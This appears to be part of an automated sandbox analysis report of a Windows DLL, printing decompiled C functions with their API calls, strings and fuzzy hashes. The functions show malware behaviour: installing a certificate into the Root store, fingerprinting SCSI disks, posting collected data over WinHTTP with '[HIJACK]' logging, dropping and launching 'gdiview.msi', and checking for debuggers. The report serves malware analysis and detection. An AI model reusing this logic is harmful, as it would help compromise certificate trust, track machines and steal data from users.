                                                                                                                                                      									if(_t54 != 0) {
                                                                                                                                                      										_t55 = E1001F720(__ebx, _t77, __esi, _a4, _a8); // executed
                                                                                                                                                      										_t101 = _t55;
                                                                                                                                                      										if(_t55 != 0) {
                                                                                                                                                      											_t57 = E1001F680( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8); // executed
                                                                                                                                                      											if(_t57 != 0) {
                                                                                                                                                      												_v536 = 1;
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _v536;
                                                                                                                                                      			}




















                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001FA58
                                                                                                                                                      • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FA6D
                                                                                                                                                      • _strcat_s.LIBCMT ref: 1001FA84
                                                                                                                                                      • _memset.LIBCMT ref: 1001FAA1
                                                                                                                                                      • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FAB6
                                                                                                                                                      • _strcat_s.LIBCMT ref: 1001FACD
                                                                                                                                                      • _memset.LIBCMT ref: 1001FAEA
                                                                                                                                                        • Part of subcall function 1001F990: _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                        • Part of subcall function 1001F990: _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                        • Part of subcall function 1001F990: _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                        • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                        • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                        • Part of subcall function 1001F720: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                        • Part of subcall function 1001F720: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                        • Part of subcall function 1001F720: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                        • Part of subcall function 1001F720: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                        • Part of subcall function 1001F720: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                      Strings
                                                                                                                                                      • SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB09
                                                                                                                                                      • \Microsoft\Windows\win_a.dat, xrefs: 1001FA73
                                                                                                                                                      • SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FB6C
                                                                                                                                                      • \Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FABC
                                                                                                                                                      • SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB2B
                                                                                                                                                      • SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FB8A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
                                                                                                                                                      • String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
                                                                                                                                                      • API String ID: 475603772-4188859120
                                                                                                                                                      • Opcode ID: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
                                                                                                                                                      • Instruction ID: cda2b8cdb8d0272306c20495e764daec9aa036c5edc3e57df8df2dc1c216ebbd
                                                                                                                                                      • Opcode Fuzzy Hash: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
                                                                                                                                                      • Instruction Fuzzy Hash: D941457A944208B7EB04DB94EC86FF93368DB68344F14845CFB1C9A182E670EB848761
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                      			E1001D560(void* __edi, char* _a4) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				struct _OVERLAPPED* _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				struct _OVERLAPPED* _v20;
                                                                                                                                                      				struct _OVERLAPPED* _v24;
                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                      				void* _v32;
                                                                                                                                                      				short _v548;
                                                                                                                                                      				char _v1010;
                                                                                                                                                      				char _v1068;
                                                                                                                                                      				char _v1070;
                                                                                                                                                      				intOrPtr _v1084;
                                                                                                                                                      				intOrPtr _v1092;
                                                                                                                                                      				intOrPtr _v1096;
                                                                                                                                                      				intOrPtr _v1100;
                                                                                                                                                      				intOrPtr _v1104;
                                                                                                                                                      				void _v1108;
                                                                                                                                                      				char _v2132;
                                                                                                                                                      				struct _OVERLAPPED* _v2136;
                                                                                                                                                      				char _v2137;
                                                                                                                                                      				long _v2144;
                                                                                                                                                      				struct _OVERLAPPED* _v2148;
                                                                                                                                                      				intOrPtr _v2152;
                                                                                                                                                      				char* _v2156;
                                                                                                                                                      				void* _t79;
                                                                                                                                                      				int _t87;
                                                                                                                                                      				intOrPtr _t91;
                                                                                                                                                      				intOrPtr _t96;
                                                                                                                                                      				void* _t125;
                                                                                                                                                      				void* _t126;
                                                                                                                                                      				void* _t127;
                                                                                                                                                      
                                                                                                                                                      				_t125 = __edi;
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				_v2136 = 0;
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				do {
                                                                                                                                                      					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20);
                                                                                                                                                      					_t127 = _t127 + 0xc;
                                                                                                                                                      					_t79 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0); // executed
                                                                                                                                                      					_v32 = _t79;
                                                                                                                                                      					if(_v32 != 0xffffffff) {
                                                                                                                                                      						_v12 = 0;
                                                                                                                                                      						while(1 != 0) {
                                                                                                                                                      							E1000CF20(_t125,  &_v1108, 0, 0x22d);
                                                                                                                                                      							_t127 = _t127 + 0xc;
                                                                                                                                                      							_v1104 = 0x49534353;
                                                                                                                                                      							_v1100 = 0x4b534944;
                                                                                                                                                      							_v1068 = _v12;
                                                                                                                                                      							_v1108 = 0x1c;
                                                                                                                                                      							_v1096 = 0x2710;
                                                                                                                                                      							_v1084 = 0x211;
                                                                                                                                                      							_v1092 = 0x1b0501;
                                                                                                                                                      							_v1070 = 0xec;
                                                                                                                                                      							_t87 = DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0); // executed
                                                                                                                                                      							if(_t87 == 0 || _v1010 == 0) {
                                                                                                                                                      								L20:
                                                                                                                                                      								if(_v2136 != 0) {
                                                                                                                                                      									L23:
                                                                                                                                                      								} else {
                                                                                                                                                      									_v12 =  &(_v12->Internal);
                                                                                                                                                      									if(_v12 < 2) {
                                                                                                                                                      										goto L23;
                                                                                                                                                      									} else {
                                                                                                                                                      										continue;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								_v16 = 0;
                                                                                                                                                      								do {
                                                                                                                                                      									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
                                                                                                                                                      									_v16 = _v16 + 1;
                                                                                                                                                      								} while (_v16 < 0x100);
                                                                                                                                                      								_t91 = E1001CD70( &_v2132);
                                                                                                                                                      								_t127 = _t127 + 4;
                                                                                                                                                      								_v28 = _t91;
                                                                                                                                                      								_v2148 = 0;
                                                                                                                                                      								_v8 = 0x104;
                                                                                                                                                      								_v2156 = _a4;
                                                                                                                                                      								_v2152 = _v28 - _a4;
                                                                                                                                                      								while(_v8 != 0x80000106) {
                                                                                                                                                      									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
                                                                                                                                                      									if(_v2137 != 0) {
                                                                                                                                                      										 *_v2156 = _v2137;
                                                                                                                                                      										_v2156 = _v2156 + 1;
                                                                                                                                                      										_t96 = _v8 - 1;
                                                                                                                                                      										_v8 = _t96;
                                                                                                                                                      										if(_t96 != 0) {
                                                                                                                                                      											continue;
                                                                                                                                                      										} else {
                                                                                                                                                      											L17:
                                                                                                                                                      											_v2156 = _v2156 - 1;
                                                                                                                                                      											_v2148 = 0x8007007a;
                                                                                                                                                      										}
                                                                                                                                                      									} else {
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									L18:
                                                                                                                                                      									 *_v2156 = 0;
                                                                                                                                                      									if(_v2148 < 0) {
                                                                                                                                                      										goto L20;
                                                                                                                                                      									} else {
                                                                                                                                                      										goto L24;
                                                                                                                                                      									}
                                                                                                                                                      									goto L25;
                                                                                                                                                      								}
                                                                                                                                                      								if(_v8 == 0) {
                                                                                                                                                      									goto L17;
                                                                                                                                                      								} else {
                                                                                                                                                      								}
                                                                                                                                                      								goto L18;
                                                                                                                                                      							}
                                                                                                                                                      							L25:
                                                                                                                                                      							FindCloseChangeNotification(_v32); // executed
                                                                                                                                                      							_v20 = _v24;
                                                                                                                                                      							goto L26;
                                                                                                                                                      						}
                                                                                                                                                      						L24:
                                                                                                                                                      						_v2136 = 1;
                                                                                                                                                      						goto L25;
                                                                                                                                                      					}
                                                                                                                                                      					L26:
                                                                                                                                                      					_v20 =  &(_v20->Internal);
                                                                                                                                                      					_v24 = _v20;
                                                                                                                                                      				} while (_v20 < 0x10);
                                                                                                                                                      				return _v2136;
                                                                                                                                                      			}



































                                                                                                                                                      APIs
                                                                                                                                                      • wsprintfW.USER32 ref: 1001D591
                                                                                                                                                      • CreateFileW.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D5B0
                                                                                                                                                      • _memset.LIBCMT ref: 1001D5E5
                                                                                                                                                      • DeviceIoControl.KERNELBASE(000000FF,0004D008,0000001C,0000003C,0000001C,0000022D,?,00000000), ref: 1001D660
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001D7A2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ChangeCloseControlCreateDeviceFileFindNotification_memsetwsprintf
                                                                                                                                                      • String ID: DISK$SCSI$\\.\Scsi%d:$z
                                                                                                                                                      • API String ID: 2954624657-153650326
                                                                                                                                                      • Opcode ID: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                      • Instruction ID: ecac459a45c55c39d0c7666526aefe1c13258bf2a5e68f6ccc56cd30cf696479
                                                                                                                                                      • Opcode Fuzzy Hash: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                      • Instruction Fuzzy Hash: 8C613AB4D04258DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB281DB759AC4CF95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                      			E10022760(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v44;
                                                                                                                                                      				char _v72;
                                                                                                                                                      				char _v100;
                                                                                                                                                      				char _v128;
                                                                                                                                                      				intOrPtr _v132;
                                                                                                                                                      				char _v160;
                                                                                                                                                      				char _v188;
                                                                                                                                                      				signed int _v192;
                                                                                                                                                      				intOrPtr _v196;
                                                                                                                                                      				intOrPtr _v200;
                                                                                                                                                      				intOrPtr _v204;
                                                                                                                                                      				intOrPtr _v208;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				char* _t56;
                                                                                                                                                      				void* _t75;
                                                                                                                                                      				void* _t76;
                                                                                                                                                      				intOrPtr _t119;
                                                                                                                                                      				void* _t127;
                                                                                                                                                      
                                                                                                                                                      				_t127 = __eflags;
                                                                                                                                                      				_t118 = __esi;
                                                                                                                                                      				_t117 = __edi;
                                                                                                                                                      				_t87 = __ebx;
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022C17);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t119;
                                                                                                                                                      				_v192 = 0;
                                                                                                                                                      				_push(_a12);
                                                                                                                                                      				_push(0x30);
                                                                                                                                                      				_push("post_info");
                                                                                                                                                      				_t56 = PathFindFileNameA(".\\post_info.cpp"); // executed
                                                                                                                                                      				E1001F1D0(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", _t56); // executed
                                                                                                                                                      				_v132 = E100223F0(__ebx, __edi, __esi, _t127, _a12);
                                                                                                                                                      				E100225D0(__ebx, __edi, __esi, _t127,  &_v128);
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v196 = E10001160( &_v160, _t127, _a8);
                                                                                                                                                      				_v200 = _v196;
                                                                                                                                                      				_v8 = 1;
                                                                                                                                                      				E10001A70( &_v128, _v200);
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				E100011A0( &_v160);
                                                                                                                                                      				E10001160( &_v100, _t127, "info=");
                                                                                                                                                      				_v8 = 2;
                                                                                                                                                      				_v204 = E10001160( &_v188, _t127, _v132);
                                                                                                                                                      				_v208 = _v204;
                                                                                                                                                      				_v8 = 3;
                                                                                                                                                      				E10001A70( &_v100, _v208);
                                                                                                                                                      				_v8 = 2;
                                                                                                                                                      				E100011A0( &_v188);
                                                                                                                                                      				_push(E100011E0( &_v128));
                                                                                                                                                      				_push(0x3d);
                                                                                                                                                      				_push("post_info");
                                                                                                                                                      				E1001F1D0(_t117, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp")); // executed
                                                                                                                                                      				E10001160( &_v44, _t127, 0x10024ca2);
                                                                                                                                                      				_v8 = 4;
                                                                                                                                                      				E10001160( &_v72, _t127, 0x10024ca3);
                                                                                                                                                      				_v8 = 5;
                                                                                                                                                      				_t75 = E10001200( &_v100);
                                                                                                                                                      				_t76 = E100011E0( &_v100);
                                                                                                                                                      				E10021AF0(__ebx, _t117, __esi, _t127, 0, 0, 0, E100011E0( &_v128), 2, 1, 0, _t76, _t75, 0, 0, 0, 0, 0, 0,  &_v44,  &_v72); // executed
                                                                                                                                                      				_push(_v132);
                                                                                                                                                      				E1000CA30(_t87, _t117, _t118, _t127);
                                                                                                                                                      				E10001110(_a4, _t127,  &_v72);
                                                                                                                                                      				_v192 = _v192 | 0x00000001;
                                                                                                                                                      				_v8 = 4;
                                                                                                                                                      				E100011A0( &_v72);
                                                                                                                                                      				_v8 = 2;
                                                                                                                                                      				E100011A0( &_v44);
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				E100011A0( &_v100);
                                                                                                                                                      				_v8 = 0xffffffff;
                                                                                                                                                      				E100011A0( &_v128);
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _a4;
                                                                                                                                                      			}
























                                                                                                                                                      APIs
                                                                                                                                                      • PathFindFileNameA.KERNELBASE(.\post_info.cpp,post_info,00000030,?), ref: 10022798
                                                                                                                                                        • Part of subcall function 1001F1D0: _memset.LIBCMT ref: 1001F1FB
                                                                                                                                                        • Part of subcall function 1001F1D0: OutputDebugStringA.KERNEL32(?,?,?,?,?,100227A9,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F233
                                                                                                                                                        • Part of subcall function 100223F0: _memset.LIBCMT ref: 10022444
                                                                                                                                                        • Part of subcall function 100223F0: _strlen.LIBCMT ref: 10022478
                                                                                                                                                        • Part of subcall function 100223F0: _memset.LIBCMT ref: 100224E6
                                                                                                                                                        • Part of subcall function 100223F0: _strlen.LIBCMT ref: 100224F2
                                                                                                                                                        • Part of subcall function 100225D0: _memset.LIBCMT ref: 10022624
                                                                                                                                                        • Part of subcall function 100225D0: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
                                                                                                                                                        • Part of subcall function 100225D0: _sprintf.LIBCMT ref: 10022666
                                                                                                                                                      • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,0000003D,00000000,?,?,info=,?,?), ref: 1002287A
                                                                                                                                                        • Part of subcall function 10021AF0: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021C24
                                                                                                                                                        • Part of subcall function 10021AF0: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021C6C
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$FileFindHttpNamePath_strlen$DebugErrorFreeHeapLastLocalOpenOptionOutputStringTime___sbh_find_block___sbh_free_block_sprintf
                                                                                                                                                      • String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
                                                                                                                                                      • API String ID: 728604215-152146038
                                                                                                                                                      • Opcode ID: 769911f16bfbc381c0fecbc11744f148040757df45974d0afd696e4a0af9f17f
                                                                                                                                                      • Instruction ID: 42968dd6338b29c892dd1ec079196b21a890ae0ab2ff2efbcc3c73078d1eef52
                                                                                                                                                      • Opcode Fuzzy Hash: 769911f16bfbc381c0fecbc11744f148040757df45974d0afd696e4a0af9f17f
                                                                                                                                                      • Instruction Fuzzy Hash: 38515F75C01258EBEB14DB94DC52FDEBB74EF18380F504198F60A67286DB702B04CB52
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001FC70(void* __edi, void* __eflags) {
                                                                                                                                                      				char _v1027;
                                                                                                                                                      				char _v1028;
                                                                                                                                                      				char _v1291;
                                                                                                                                                      				char _v1292;
                                                                                                                                                      				int _t21;
                                                                                                                                                      				void* _t22;
                                                                                                                                                      
                                                                                                                                                      				_t29 = __edi;
                                                                                                                                                      				_v1292 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v1291, 0, 0x103);
                                                                                                                                                      				_v1028 = 0;
                                                                                                                                                      				E1000CF20(_t29,  &_v1027, 0, 0x3ff);
                                                                                                                                                      				GetTempPathA(0x104,  &_v1292);
                                                                                                                                                      				E1000CD96( &_v1292,  &_v1292, 0x104, "gdiview.msi");
                                                                                                                                                      				E1000CC93(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292);
                                                                                                                                                      				E1001FC10( &_v1292, 0x10026888, 0x39e00); // executed
                                                                                                                                                      				_t21 = PathFileExistsA( &_v1292); // executed
                                                                                                                                                      				_t38 = _t21;
                                                                                                                                                      				if(_t21 != 0) {
                                                                                                                                                      					_t22 = E1001A1D0(_t38,  &_v1028); // executed
                                                                                                                                                      					return _t22;
                                                                                                                                                      				}
                                                                                                                                                      				return _t21;
                                                                                                                                                      			}










                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001FC8E
                                                                                                                                                      • _memset.LIBCMT ref: 1001FCAB
                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FCBF
                                                                                                                                                      • _strcat_s.LIBCMT ref: 1001FCD6
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001FCF1
                                                                                                                                                        • Part of subcall function 1001FC10: CreateFileA.KERNELBASE(10026888,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC33
                                                                                                                                                        • Part of subcall function 1001FC10: WriteFile.KERNELBASE(00039E00,00000000,00000000,10026888,00000000), ref: 1001FC4E
                                                                                                                                                        • Part of subcall function 1001FC10: CloseHandle.KERNEL32(00039E00), ref: 1001FC63
                                                                                                                                                      • PathFileExistsA.KERNELBASE(00000000), ref: 1001FD19
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                        • Part of subcall function 1001A1D0: CreateProcessA.KERNELBASE(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
                                                                                                                                                      • String ID: gdiview.msi$msiexec.exe /i "%s"
                                                                                                                                                      • API String ID: 1459467440-729886463
                                                                                                                                                      • Opcode ID: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
                                                                                                                                                      • Instruction ID: fc1d18d4907088cb0004c85748b024e0f714aa859ea981698376c8e2dc0c21e3
                                                                                                                                                      • Opcode Fuzzy Hash: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
                                                                                                                                                      • Instruction Fuzzy Hash: 431170BAD402186AE750D760EC46FEE7328DB54701F4444A4BB48A5085EBB1A7988F92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                      			E10020575(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                      				int _t20;
                                                                                                                                                      				intOrPtr _t31;
                                                                                                                                                      				void* _t33;
                                                                                                                                                      				void* _t35;
                                                                                                                                                      				void* _t47;
                                                                                                                                                      				void* _t49;
                                                                                                                                                      				intOrPtr _t51;
                                                                                                                                                      				void* _t52;
                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                      				intOrPtr _t55;
                                                                                                                                                      				intOrPtr _t57;
                                                                                                                                                      
                                                                                                                                                      				_t62 = __eflags;
                                                                                                                                                      				_t45 = __esi;
                                                                                                                                                      				_t44 = __edi;
                                                                                                                                                      				_t36 = __ebx;
                                                                                                                                                      				E1001FDB0(); // executed
                                                                                                                                                      				E1001FF90(__ebx, __edi, __esi, __eflags, "install", "user01", "-0.25", "45.0.0", "exe"); // executed
                                                                                                                                                      				_t51 = _t49 + 0x14 - 0x1c;
                                                                                                                                                      				_t37 = _t51;
                                                                                                                                                      				 *((intOrPtr*)(_t47 - 0x248)) = _t51;
                                                                                                                                                      				 *((intOrPtr*)(_t47 - 0x260)) = E10001160(_t51, __eflags, "status=main_start");
                                                                                                                                                      				E10020180(__ebx, __edi, __esi, _t62); // executed
                                                                                                                                                      				_t52 = _t51 + 0x1c;
                                                                                                                                                      				_t20 = PathFileExistsA("C:\\hijack"); // executed
                                                                                                                                                      				if(_t20 != 0) {
                                                                                                                                                      					L7:
                                                                                                                                                      					_t53 = _t52 - 0x1c;
                                                                                                                                                      					 *((intOrPtr*)(_t47 - 0x24c)) = _t53;
                                                                                                                                                      					 *((intOrPtr*)(_t47 - 0x264)) = E10001160(_t53, __eflags, "status=check_debug");
                                                                                                                                                      					E10020180(_t36, _t44, _t45, __eflags); // executed
                                                                                                                                                      					_t55 = _t53 + 0x1c - 0x1c;
                                                                                                                                                      					 *((intOrPtr*)(_t47 - 0x250)) = _t55;
                                                                                                                                                      					 *((intOrPtr*)(_t47 - 0x268)) = E10001160(_t55, __eflags, "user01");
                                                                                                                                                      					E1001FEA0(_t36, _t44, _t45, __eflags); // executed
                                                                                                                                                      					_t57 = _t55 + 0x1c - 0x1c;
                                                                                                                                                      					 *((intOrPtr*)(_t47 - 0x254)) = _t57;
                                                                                                                                                      					 *((intOrPtr*)(_t47 - 0x26c)) = E10001160(_t57, __eflags, "user01");
                                                                                                                                                      					E1001FDC0(_t36, _t44, _t45, __eflags); // executed
                                                                                                                                                      					_t59 = _t57 + 0x1c - 0x1c;
                                                                                                                                                      					 *((intOrPtr*)(_t47 - 0x258)) = _t57 + 0x1c - 0x1c;
                                                                                                                                                      					 *((intOrPtr*)(_t47 - 0x270)) = E10001160(_t59, __eflags, "status=main_over");
                                                                                                                                                      					E10020180(_t36, _t44, _t45, __eflags); // executed
                                                                                                                                                      				} else {
                                                                                                                                                      					E1001A0A0(); // executed
                                                                                                                                                      					_t33 = E1001A0B0(_t37); // executed
                                                                                                                                                      					if(_t33 == 0 || E10019D10() != 0) {
                                                                                                                                                      					} else {
                                                                                                                                                      						_t35 = E1001FA30(_t36, _t44, _t45, __eflags, 0x3e8, 0); // executed
                                                                                                                                                      						_t52 = _t52 + 8;
                                                                                                                                                      						__eflags = _t35;
                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                      							goto L7;
                                                                                                                                                      						} else {
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				E1001A260(); // executed
                                                                                                                                                      				 *((intOrPtr*)(_t47 - 0x25c)) = 1;
                                                                                                                                                      				 *((intOrPtr*)(_t47 - 4)) = 0xffffffff;
                                                                                                                                                      				E100011A0(_t47 - 0x28);
                                                                                                                                                      				_t31 =  *((intOrPtr*)(_t47 - 0x25c));
                                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
                                                                                                                                                      				return _t31;
                                                                                                                                                      			}














                                                                                                                                                      0x10020761
                                                                                                                                                      0x1002076b
                                                                                                                                                      0x10020775
                                                                                                                                                      0x1002077a
                                                                                                                                                      0x10020783
                                                                                                                                                      0x1002078e

                                                                                                                                                      APIs
                                                                                                                                                      • PathFileExistsA.KERNELBASE(C:\hijack), ref: 10020692
                                                                                                                                                        • Part of subcall function 10019D10: GetSystemDefaultLCID.KERNEL32 ref: 10019D1D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
